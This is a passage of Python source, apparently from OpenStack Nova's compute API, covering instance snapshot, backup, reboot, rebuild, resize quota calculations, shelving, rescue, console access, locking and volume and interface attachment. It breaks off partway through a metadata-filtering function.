fields.extend(expected_attrs)
return objects.InstanceList.get_by_filters(
context, filters=filters, sort_key=sort_key, sort_dir=sort_dir,
limit=limit, marker=marker, expected_attrs=fields)
# NOTE(melwitt): We don't check instance lock for backup because lock is
# intended to prevent accidental change/delete of instances
@wrap_check_policy
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def backup(self, context, instance, name, backup_type, rotation,
extra_properties=None):
"""Backup the given instance
:param instance: nova.db.sqlalchemy.models.Instance
:param name: name of the backup
:param backup_type: 'daily' or 'weekly'
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
:param extra_properties: dict of extra image properties to include
when creating the image.
:returns: A dict containing image metadata
"""
props_copy = dict(extra_properties, backup_type=backup_type)
image_meta = self._create_image(context, instance, name,
'backup', extra_properties=props_copy)
# NOTE(comstud): Any changes to this method should also be made
# to the backup_instance() method in nova/cells/messaging.py
instance.task_state = task_states.IMAGE_BACKUP
instance.save(expected_task_state=[None])
self.compute_rpcapi.backup_instance(context, instance,
image_meta['id'],
backup_type,
rotation)
return image_meta
# NOTE(melwitt): We don't check instance lock for snapshot because lock is
# intended to prevent accidental change/delete of instances
@wrap_check_policy
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.PAUSED, vm_states.SUSPENDED])
def snapshot(self, context, instance, name, extra_properties=None):
"""Snapshot the given instance.
:param instance: nova.db.sqlalchemy.models.Instance
:param name: name of the snapshot
:param extra_properties: dict of extra image properties to include
when creating the image.
:returns: A dict containing image metadata
"""
image_meta = self._create_image(context, instance, name,
'snapshot',
extra_properties=extra_properties)
# NOTE(comstud): Any changes to this method should also be made
# to the snapshot_instance() method in nova/cells/messaging.py
instance.task_state = task_states.IMAGE_SNAPSHOT_PENDING
instance.save(expected_task_state=[None])
self.compute_rpcapi.snapshot_instance(context, instance,
image_meta['id'])
return image_meta
def _create_image(self, context, instance, name, image_type,
extra_properties=None):
"""Create new image entry in the image service. This new image
will be reserved for the compute manager to upload a snapshot
or backup.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param name: string for name of the snapshot
:param image_type: snapshot | backup
:param extra_properties: dict of extra image properties to include
"""
if extra_properties is None:
extra_properties = {}
instance_uuid = instance['uuid']
properties = {
'instance_uuid': instance_uuid,
'user_id': str(context.user_id),
'image_type': image_type,
}
image_ref = instance.image_ref
sent_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
sent_meta['name'] = name
sent_meta['is_public'] = False
# The properties set up above and in extra_properties have precedence
properties.update(extra_properties or {})
sent_meta['properties'].update(properties)
return self.image_api.create(context, sent_meta)
# NOTE(melwitt): We don't check instance lock for snapshot because lock is
# intended to prevent accidental change/delete of instances
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def snapshot_volume_backed(self, context, instance, image_meta, name,
extra_properties=None):
"""Snapshot the given volume-backed instance.
:param instance: nova.db.sqlalchemy.models.Instance
:param image_meta: metadata for the new image
:param name: name of the backup or snapshot
:param extra_properties: dict of extra image properties to include
:returns: the new image metadata
"""
image_meta['name'] = name
image_meta['is_public'] = False
properties = image_meta['properties']
if instance['root_device_name']:
properties['root_device_name'] = instance['root_device_name']
properties.update(extra_properties or {})
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
mapping = []
for bdm in bdms:
if bdm.no_device:
continue
if bdm.is_volume:
# create snapshot based on volume_id
volume = self.volume_api.get(context, bdm.volume_id)
# NOTE(yamahata): Should we wait for snapshot creation?
# Linux LVM snapshot creation completes in a
# short time, so it doesn't matter for now.
name = _('snapshot for %s') % image_meta['name']
snapshot = self.volume_api.create_snapshot_force(
context, volume['id'], name, volume['display_description'])
mapping_dict = block_device.snapshot_from_bdm(snapshot['id'],
bdm)
mapping_dict = mapping_dict.get_image_mapping()
else:
mapping_dict = bdm.get_image_mapping()
mapping.append(mapping_dict)
# NOTE (ndipanov): Remove swap/ephemerals from mappings as they will be
# in the block_device_mapping for the new image.
image_mappings = properties.get('mappings')
if image_mappings:
properties['mappings'] = [m for m in image_mappings
if not block_device.is_swap_or_ephemeral(
m['virtual'])]
if mapping:
properties['block_device_mapping'] = mapping
properties['bdm_v2'] = True
for attr in ('status', 'location', 'id', 'owner'):
image_meta.pop(attr, None)
# the new image is simply a bucket of properties (particularly the
# block device mapping, kernel and ramdisk IDs) with no image data,
# hence the zero size
image_meta['size'] = 0
return self.image_api.create(context, image_meta)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=set(
vm_states.ALLOW_SOFT_REBOOT + vm_states.ALLOW_HARD_REBOOT),
task_state=[None, task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED,
task_states.REBOOTING_HARD,
task_states.RESUMING,
task_states.UNPAUSING,
task_states.PAUSING,
task_states.SUSPENDING])
def reboot(self, context, instance, reboot_type):
"""Reboot the given instance."""
if (reboot_type == 'SOFT' and
(instance['vm_state'] not in vm_states.ALLOW_SOFT_REBOOT)):
raise exception.InstanceInvalidState(
attr='vm_state',
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method='soft reboot')
if ((reboot_type == 'SOFT' and
instance['task_state'] in
(task_states.REBOOTING, task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING, task_states.REBOOT_STARTED)) or
(reboot_type == 'HARD' and
instance['task_state'] == task_states.REBOOTING_HARD)):
raise exception.InstanceInvalidState(
attr='task_state',
instance_uuid=instance['uuid'],
state=instance['task_state'],
method='reboot')
state = {'SOFT': task_states.REBOOTING,
'HARD': task_states.REBOOTING_HARD}[reboot_type]
instance.task_state = state
instance.save(expected_task_state=[None, task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED])
self._record_action_start(context, instance, instance_actions.REBOOT)
self.compute_rpcapi.reboot_instance(context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def rebuild(self, context, instance, image_href, admin_password,
files_to_inject=None, **kwargs):
"""Rebuild the given instance with the provided attributes."""
orig_image_ref = instance.image_ref or ''
files_to_inject = files_to_inject or []
metadata = kwargs.get('metadata', {})
preserve_ephemeral = kwargs.get('preserve_ephemeral', False)
auto_disk_config = kwargs.get('auto_disk_config')
image_id, image = self._get_image(context, image_href)
self._check_auto_disk_config(image=image, **kwargs)
flavor = instance.get_flavor()
self._checks_for_create_and_rebuild(context, image_id, image,
flavor, metadata, files_to_inject)
kernel_id, ramdisk_id = self._handle_kernel_and_ramdisk(
context, None, None, image)
def _reset_image_metadata():
"""Remove old image properties that we're storing as instance
system metadata. These properties start with 'image_'.
Then add the properties for the new image.
"""
# FIXME(comstud): There's a race condition here in that if
# the system_metadata for this instance is updated after
# we do the previous save() and before we update.. those
# other updates will be lost. Since this problem exists in
# a lot of other places, I think it should be addressed in
# a DB layer overhaul.
orig_sys_metadata = dict(instance.system_metadata)
# Remove the old keys
for key in instance.system_metadata.keys():
if key.startswith(utils.SM_IMAGE_PROP_PREFIX):
del instance.system_metadata[key]
# Add the new ones
new_sys_metadata = utils.get_system_metadata_from_image(
image, flavor)
instance.system_metadata.update(new_sys_metadata)
instance.save()
return orig_sys_metadata
# Since image might have changed, we may have new values for
# os_type, vm_mode, etc
options_from_image = self._inherit_properties_from_image(
image, auto_disk_config)
instance.update(options_from_image)
instance.task_state = task_states.REBUILDING
instance.image_ref = image_href
instance.kernel_id = kernel_id or ""
instance.ramdisk_id = ramdisk_id or ""
instance.progress = 0
instance.update(kwargs)
instance.save(expected_task_state=[None])
# On a rebuild, since we're potentially changing images, we need to
# wipe out the old image properties that we're storing as instance
# system metadata... and copy in the properties for the new image.
orig_sys_metadata = _reset_image_metadata()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._record_action_start(context, instance, instance_actions.REBUILD)
self.compute_task_api.rebuild_instance(context, instance=instance,
new_pass=admin_password, injected_files=files_to_inject,
image_ref=image_href, orig_image_ref=orig_image_ref,
orig_sys_metadata=orig_sys_metadata, bdms=bdms,
preserve_ephemeral=preserve_ephemeral, host=instance.host,
kwargs=kwargs)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.RESIZED])
def revert_resize(self, context, instance):
"""Reverts a resize, deleting the 'new' instance in the process."""
elevated = context.elevated()
migration = objects.Migration.get_by_instance_and_status(
elevated, instance.uuid, 'finished')
# reverse quota reservation for increased resource usage
deltas = self._reverse_upsize_quota_delta(context, migration)
quotas = self._reserve_quota_delta(context, deltas, instance)
instance.task_state = task_states.RESIZE_REVERTING
try:
instance.save(expected_task_state=[None])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback(context)
migration.status = 'reverting'
migration.save()
# With cells, the best we can do right now is commit the reservations
# immediately...
if CONF.cells.enable:
quotas.commit(context)
self._record_action_start(context, instance,
instance_actions.REVERT_RESIZE)
self.compute_rpcapi.revert_resize(context, instance,
migration,
migration.dest_compute,
quotas.reservations or [])
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.RESIZED])
def confirm_resize(self, context, instance, migration=None):
"""Confirms a migration/resize and deletes the 'old' instance."""
elevated = context.elevated()
if migration is None:
migration = objects.Migration.get_by_instance_and_status(
elevated, instance.uuid, 'finished')
# reserve quota only for any decrease in resource usage
deltas = self._downsize_quota_delta(context, instance)
quotas = self._reserve_quota_delta(context, deltas, instance)
migration.status = 'confirming'
migration.save()
# With cells, the best we can do right now is commit the reservations
# immediately...
if CONF.cells.enable:
quotas.commit(context)
self._record_action_start(context, instance,
instance_actions.CONFIRM_RESIZE)
self.compute_rpcapi.confirm_resize(context,
instance,
migration,
migration.source_compute,
quotas.reservations or [])
@staticmethod
def _resize_quota_delta(context, new_flavor,
old_flavor, sense, compare):
"""Calculate any quota adjustment required at a particular point
in the resize cycle.
:param context: the request context
:param new_flavor: the target flavor
:param old_flavor: the original flavor
:param sense: the sense of the adjustment, 1 indicates a
forward adjustment, whereas -1 indicates a
reversal of a prior adjustment
:param compare: the direction of the comparison, 1 indicates
we're checking for positive deltas, whereas
-1 indicates negative deltas
"""
def _quota_delta(resource):
return sense * (new_flavor[resource] - old_flavor[resource])
deltas = {}
if compare * _quota_delta('vcpus') > 0:
deltas['cores'] = _quota_delta('vcpus')
if compare * _quota_delta('memory_mb') > 0:
deltas['ram'] = _quota_delta('memory_mb')
return deltas
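# Worked example (hypothetical flavors): upsizing from a flavor with
# vcpus=2, memory_mb=4096 to one with vcpus=4, memory_mb=8192, with
# sense=1 and compare=1, yields {'cores': 2, 'ram': 4096}; the same
# flavors with sense=-1 and compare=-1 (reversing a prior upsize)
# yield {'cores': -2, 'ram': -4096}.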
@staticmethod
def _upsize_quota_delta(context, new_flavor, old_flavor):
"""Calculate deltas required to adjust quota for an instance upsize.
"""
return API._resize_quota_delta(context, new_flavor, old_flavor, 1, 1)
@staticmethod
def _reverse_upsize_quota_delta(context, migration_ref):
"""Calculate deltas required to reverse a prior upsizing
quota adjustment.
"""
old_flavor = objects.Flavor.get_by_id(
context, migration_ref['old_instance_type_id'])
new_flavor = objects.Flavor.get_by_id(
context, migration_ref['new_instance_type_id'])
return API._resize_quota_delta(context, new_flavor, old_flavor, -1, -1)
@staticmethod
def _downsize_quota_delta(context, instance):
"""Calculate deltas required to adjust quota for an instance downsize.
"""
old_flavor = instance.get_flavor('old')
new_flavor = instance.get_flavor('new')
return API._resize_quota_delta(context, new_flavor, old_flavor, 1, -1)
@staticmethod
def _reserve_quota_delta(context, deltas, instance):
"""If there are deltas to reserve, construct a Quotas object and
reserve the deltas for the given project.
@param context: The nova request context.
@param deltas: A dictionary of the proposed delta changes.
@param instance: The instance we're operating on, so that
quotas can use the correct project_id/user_id.
@return: nova.objects.quotas.Quotas
"""
quotas = objects.Quotas()
if deltas:
project_id, user_id = quotas_obj.ids_from_instance(context,
instance)
quotas.reserve(context, project_id=project_id, user_id=user_id,
**deltas)
return quotas
@staticmethod
def _resize_cells_support(context, quotas, instance,
current_instance_type, new_instance_type):
"""Special API cell logic for resize."""
# With cells, the best we can do right now is commit the
# reservations immediately...
quotas.commit(context)
# NOTE(johannes/comstud): The API cell needs a local migration
# record for later resize_confirm and resize_reverts to deal
# with quotas. We don't need source and/or destination
# information, just the old and new flavors. Status is set to
# 'finished' since nothing else will update the status along
# the way.
mig = objects.Migration()
mig.instance_uuid = instance.uuid
mig.old_instance_type_id = current_instance_type['id']
mig.new_instance_type_id = new_instance_type['id']
mig.status = 'finished'
mig.create(context.elevated())
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def resize(self, context, instance, flavor_id=None,
**extra_instance_updates):
"""Resize (ie, migrate) a running instance.
If flavor_id is None, the process is considered a migration, keeping
the original flavor_id. If flavor_id is not None, the instance should
be migrated to a new host and resized to the new flavor_id.
"""
self._check_auto_disk_config(instance, **extra_instance_updates)
current_instance_type = flavors.extract_flavor(instance)
# If flavor_id is not provided, only migrate the instance.
if not flavor_id:
LOG.debug("flavor_id is None. Assuming migration.",
instance=instance)
new_instance_type = current_instance_type
else:
new_instance_type = flavors.get_flavor_by_flavor_id(
flavor_id, read_deleted="no")
if (new_instance_type.get('root_gb') == 0 and
current_instance_type.get('root_gb') != 0):
reason = _('Resize to zero disk flavor is not allowed.')
raise exception.CannotResizeDisk(reason=reason)
if not new_instance_type:
raise exception.FlavorNotFound(flavor_id=flavor_id)
current_instance_type_name = current_instance_type['name']
new_instance_type_name = new_instance_type['name']
LOG.debug("Old instance type %(current_instance_type_name)s, "
" new instance type %(new_instance_type_name)s",
{'current_instance_type_name': current_instance_type_name,
'new_instance_type_name': new_instance_type_name},
instance=instance)
same_instance_type = (current_instance_type['id'] ==
new_instance_type['id'])
# NOTE(sirp): We don't want to force a customer to change their flavor
# when Ops is migrating off of a failed host.
if not same_instance_type and new_instance_type.get('disabled'):
raise exception.FlavorNotFound(flavor_id=flavor_id)
if same_instance_type and flavor_id and self.cell_type != 'compute':
raise exception.CannotResizeToSameFlavor()
# ensure there is sufficient headroom for upsizes
deltas = self._upsize_quota_delta(context, new_instance_type,
current_instance_type)
try:
quotas = self._reserve_quota_delta(context, deltas, instance)
except exception.OverQuota as exc:
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
headroom = exc.kwargs['headroom']
resource = overs[0]
used = quotas[resource] - headroom[resource]
total_allowed = used + headroom[resource]
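# Numeric sketch (hypothetical values): if the 'cores' quota is 20 and
# the remaining headroom is 2, then used = 20 - 2 = 18 and
# total_allowed = 18 + 2 = 20, so the exception below reports the
# requested cores (deltas[resource]) against 18 used of 20 allowed.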
overs = ','.join(overs)
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to resize instance."),
{'overs': overs, 'pid': context.project_id})
raise exception.TooManyInstances(overs=overs,
req=deltas[resource],
used=used, allowed=total_allowed,
resource=resource)
instance.task_state = task_states.RESIZE_PREP
instance.progress = 0
instance.update(extra_instance_updates)
instance.save(expected_task_state=[None])
filter_properties = {'ignore_hosts': []}
if not CONF.allow_resize_to_same_host:
filter_properties['ignore_hosts'].append(instance['host'])
# Here, when flavor_id is None, the process is considered a migration.
if (not flavor_id and not CONF.allow_migrate_to_same_host):
filter_properties['ignore_hosts'].append(instance['host'])
if self.cell_type == 'api':
# Commit reservations early and create migration record.
self._resize_cells_support(context, quotas, instance,
current_instance_type,
new_instance_type)
if not flavor_id:
self._record_action_start(context, instance,
instance_actions.MIGRATE)
else:
self._record_action_start(context, instance,
instance_actions.RESIZE)
scheduler_hint = {'filter_properties': filter_properties}
self.compute_task_api.resize_instance(context, instance,
extra_instance_updates, scheduler_hint=scheduler_hint,
flavor=new_instance_type,
reservations=quotas.reservations or [])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.PAUSED, vm_states.SUSPENDED])
def shelve(self, context, instance):
"""Shelve an instance.
Shuts down an instance and frees it up to be removed from the
hypervisor.
"""
instance.task_state = task_states.SHELVING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.SHELVE)
image_id = None
if not self.is_volume_backed_instance(context, instance):
name = '%s-shelved' % instance['display_name']
image_meta = self._create_image(context, instance, name,
'snapshot')
image_id = image_meta['id']
self.compute_rpcapi.shelve_instance(context, instance=instance,
image_id=image_id)
else:
self.compute_rpcapi.shelve_offload_instance(context,
instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SHELVED])
def shelve_offload(self, context, instance):
"""Remove a shelved instance from the hypervisor."""
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save(expected_task_state=[None])
self.compute_rpcapi.shelve_offload_instance(context, instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SHELVED,
vm_states.SHELVED_OFFLOADED])
def unshelve(self, context, instance):
"""Restore a shelved instance."""
instance.task_state = task_states.UNSHELVING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNSHELVE)
self.compute_task_api.unshelve_instance(context, instance)
@wrap_check_policy
@check_instance_lock
def add_fixed_ip(self, context, instance, network_id):
"""Add fixed_ip from specified network to given instance."""
self.compute_rpcapi.add_fixed_ip_to_instance(context,
instance=instance, network_id=network_id)
@wrap_check_policy
@check_instance_lock
def remove_fixed_ip(self, context, instance, address):
"""Remove fixed_ip from specified network to given instance."""
self.compute_rpcapi.remove_fixed_ip_from_instance(context,
instance=instance, address=address)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def pause(self, context, instance):
"""Pause the given instance."""
instance.task_state = task_states.PAUSING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.PAUSE)
self.compute_rpcapi.pause_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.PAUSED])
def unpause(self, context, instance):
"""Unpause the given instance."""
instance.task_state = task_states.UNPAUSING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNPAUSE)
self.compute_rpcapi.unpause_instance(context, instance)
@wrap_check_policy
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for the given instance."""
return self.compute_rpcapi.get_diagnostics(context, instance=instance)
@wrap_check_policy
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for the given instance."""
return self.compute_rpcapi.get_instance_diagnostics(context,
instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def suspend(self, context, instance):
"""Suspend the given instance."""
instance.task_state = task_states.SUSPENDING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.SUSPEND)
self.compute_rpcapi.suspend_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.SUSPENDED])
def resume(self, context, instance):
"""Resume the given instance."""
instance.task_state = task_states.RESUMING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.RESUME)
self.compute_rpcapi.resume_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def rescue(self, context, instance, rescue_password=None,
rescue_image_ref=None):
"""Rescue the given instance."""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.volume_id:
vol = self.volume_api.get(context, bdm.volume_id)
self.volume_api.check_attached(context, vol)
if self.is_volume_backed_instance(context, instance, bdms):
reason = _("Cannot rescue a volume-backed instance")
raise exception.InstanceNotRescuable(instance_id=instance.uuid,
reason=reason)
instance.task_state = task_states.RESCUING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.RESCUE)
self.compute_rpcapi.rescue_instance(context, instance=instance,
rescue_password=rescue_password, rescue_image_ref=rescue_image_ref)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.RESCUED])
def unrescue(self, context, instance):
"""Unrescue the given instance."""
instance.task_state = task_states.UNRESCUING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNRESCUE)
self.compute_rpcapi.unrescue_instance(context, instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def set_admin_password(self, context, instance, password=None):
"""Set the root/admin password for the given instance.
@param context: Nova auth context.
@param instance: Nova instance object.
@param password: The admin password for the instance.
"""
instance.task_state = task_states.UPDATING_PASSWORD
instance.save(expected_task_state=[None])
self._record_action_start(context, instance,
instance_actions.CHANGE_PASSWORD)
self.compute_rpcapi.set_admin_password(context,
instance=instance,
new_pass=password)
@wrap_check_policy
@check_instance_host
def get_vnc_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_vnc_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_vnc_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_vnc_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_spice_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_spice_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_spice_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_spice_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_rdp_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_rdp_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_rdp_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_rdp_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_serial_console(self, context, instance, console_type):
"""Get a url to a serial console."""
connect_info = self.compute_rpcapi.get_serial_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_serial_console_connect_info(self, context, instance, console_type):
"""Used in a child cell to get serial console."""
connect_info = self.compute_rpcapi.get_serial_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_console_output(self, context, instance, tail_length=None):
"""Get console output for an instance."""
return self.compute_rpcapi.get_console_output(context,
instance=instance, tail_length=tail_length)
@wrap_check_policy
def lock(self, context, instance):
"""Lock the given instance."""
# Only update the lock if we are an admin (non-owner)
is_owner = instance.project_id == context.project_id
if instance.locked and is_owner:
return
context = context.elevated()
LOG.debug('Locking', context=context, instance=instance)
instance.locked = True
instance.locked_by = 'owner' if is_owner else 'admin'
instance.save()
@wrap_check_policy
def unlock(self, context, instance):
"""Unlock the given instance."""
# If the instance was locked by someone else, check
# that we're allowed to override the lock
is_owner = instance.project_id == context.project_id
expect_locked_by = 'owner' if is_owner else 'admin'
locked_by = instance.locked_by
if locked_by and locked_by != expect_locked_by:
check_policy(context, 'unlock_override', instance)
context = context.elevated()
LOG.debug('Unlocking', context=context, instance=instance)
instance.locked = False
instance.locked_by = None
instance.save()
@wrap_check_policy
def get_lock(self, context, instance):
"""Return the boolean state of given instance's lock."""
return self.get(context, instance['uuid'])['locked']
@wrap_check_policy
@check_instance_lock
@check_instance_cell
def reset_network(self, context, instance):
"""Reset networking on the instance."""
self.compute_rpcapi.reset_network(context, instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
def inject_network_info(self, context, instance):
"""Inject network info for the instance."""
self.compute_rpcapi.inject_network_info(context, instance=instance)
def _attach_volume(self, context, instance, volume_id, device,
disk_bus, device_type):
"""Attach an existing volume to an existing instance.
This method is separated to make it possible for the cells version
to override it.
"""
# NOTE(vish): This is done on the compute host because we want
# to avoid a race where two devices are requested at
# the same time. When db access is removed from
# compute, the bdm will be created here and we will
# have to make sure that they are assigned atomically.
volume_bdm = self.compute_rpcapi.reserve_block_device_name(
context, instance, device, volume_id, disk_bus=disk_bus,
device_type=device_type)
try:
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_attach(context, volume, instance=instance)
self.volume_api.reserve_volume(context, volume_id)
self.compute_rpcapi.attach_volume(context, instance=instance,
volume_id=volume_id, mountpoint=device, bdm=volume_bdm)
except Exception:
with excutils.save_and_reraise_exception():
volume_bdm.destroy(context)
return volume_bdm.device_name
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED, vm_states.RESIZED,
vm_states.SOFT_DELETED])
def attach_volume(self, context, instance, volume_id, device=None,
disk_bus=None, device_type=None):
"""Attach an existing volume to an existing instance."""
# NOTE(vish): Fail fast if the device is not going to pass. This
# will need to be removed along with the test if we
# change the logic in the manager for what constitutes
# a valid device.
if device and not block_device.match_device(device):
raise exception.InvalidDevicePath(path=device)
return self._attach_volume(context, instance, volume_id, device,
disk_bus, device_type)
def _detach_volume(self, context, instance, volume):
"""Detach volume from instance.
This method is separated to make it easier for the cells version
to override.
"""
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume['id'])
self.compute_rpcapi.detach_volume(context, instance=instance,
volume_id=volume['id'])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED, vm_states.RESIZED,
vm_states.SOFT_DELETED])
def detach_volume(self, context, instance, volume):
"""Detach a volume from an instance."""
if volume['attach_status'] == 'detached':
msg = _("Volume must be attached in order to detach.")
raise exception.InvalidVolume(reason=msg)
# The caller likely got the instance from volume['instance_uuid']
# in the first place, but let's sanity check.
if volume['instance_uuid'] != instance['uuid']:
raise exception.VolumeUnattached(volume_id=volume['id'])
self._detach_volume(context, instance, volume)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED,
vm_states.RESIZED, vm_states.SOFT_DELETED])
def swap_volume(self, context, instance, old_volume, new_volume):
"""Swap volume attached to an instance."""
if old_volume['attach_status'] == 'detached':
raise exception.VolumeUnattached(volume_id=old_volume['id'])
# The caller likely got the instance from volume['instance_uuid']
# in the first place, but let's sanity check.
if old_volume['instance_uuid'] != instance['uuid']:
msg = _("Old volume is attached to a different instance.")
raise exception.InvalidVolume(reason=msg)
if new_volume['attach_status'] == 'attached':
msg = _("New volume must be detached in order to swap.")
raise exception.InvalidVolume(reason=msg)
if int(new_volume['size']) < int(old_volume['size']):
msg = _("New volume must be the same size or larger.")
raise exception.InvalidVolume(reason=msg)
self.volume_api.check_detach(context, old_volume)
self.volume_api.check_attach(context, new_volume, instance=instance)
self.volume_api.begin_detaching(context, old_volume['id'])
self.volume_api.reserve_volume(context, new_volume['id'])
try:
self.compute_rpcapi.swap_volume(
context, instance=instance,
old_volume_id=old_volume['id'],
new_volume_id=new_volume['id'])
except Exception: # pylint: disable=W0702
with excutils.save_and_reraise_exception():
self.volume_api.roll_detaching(context, old_volume['id'])
self.volume_api.unreserve_volume(context, new_volume['id'])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED],
task_state=[None])
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
return self.compute_rpcapi.attach_interface(context,
instance=instance, network_id=network_id, port_id=port_id,
requested_ip=requested_ip)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED],
task_state=[None])
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
self.compute_rpcapi.detach_interface(context, instance=instance,
port_id=port_id)
@wrap_check_policy
def get_instance_metadata(self, context, instance):
"""Get all metadata associated with an instance."""
rv = self.db.instance_metadata_get(context, instance['uuid'])
return dict(rv.iteritems())
def get_all_instance_metadata(self, context, search_filts):
return self._get_all_instance_metadata(
context, search_filts, metadata_type='metadata')
def get_all_system_metadata(self, context, search_filts):
return self._get_all_instance_metadata(
context, search_filts, metadata_type='system_metadata')
def _get_all_instance_metadata(self, context, search_filts, metadata_type):
"""Get all metadata."""
def _match_any(pattern_list, string):
return any([re.match(pattern, string)
for pattern in pattern_list])
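# Example of the helper above (illustrative patterns): with
# pattern_list = ['^web', 'db'], the string 'web01' matches '^web' and
# 'db01' matches 'db', while 'api01' matches neither, so _match_any
# returns True, True, False respectively (re.match anchors at the start).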
def _filter_metadata(instance, search_filt, input_metadata):
uuids = search_filt.get('resource_id', [])
keys_filter = search_filt.get('key', [])
values_filter = search_filt.get('value', [])
output_metadata = {}
if uuids and instance.get('uuid') not in uuids:
return {}
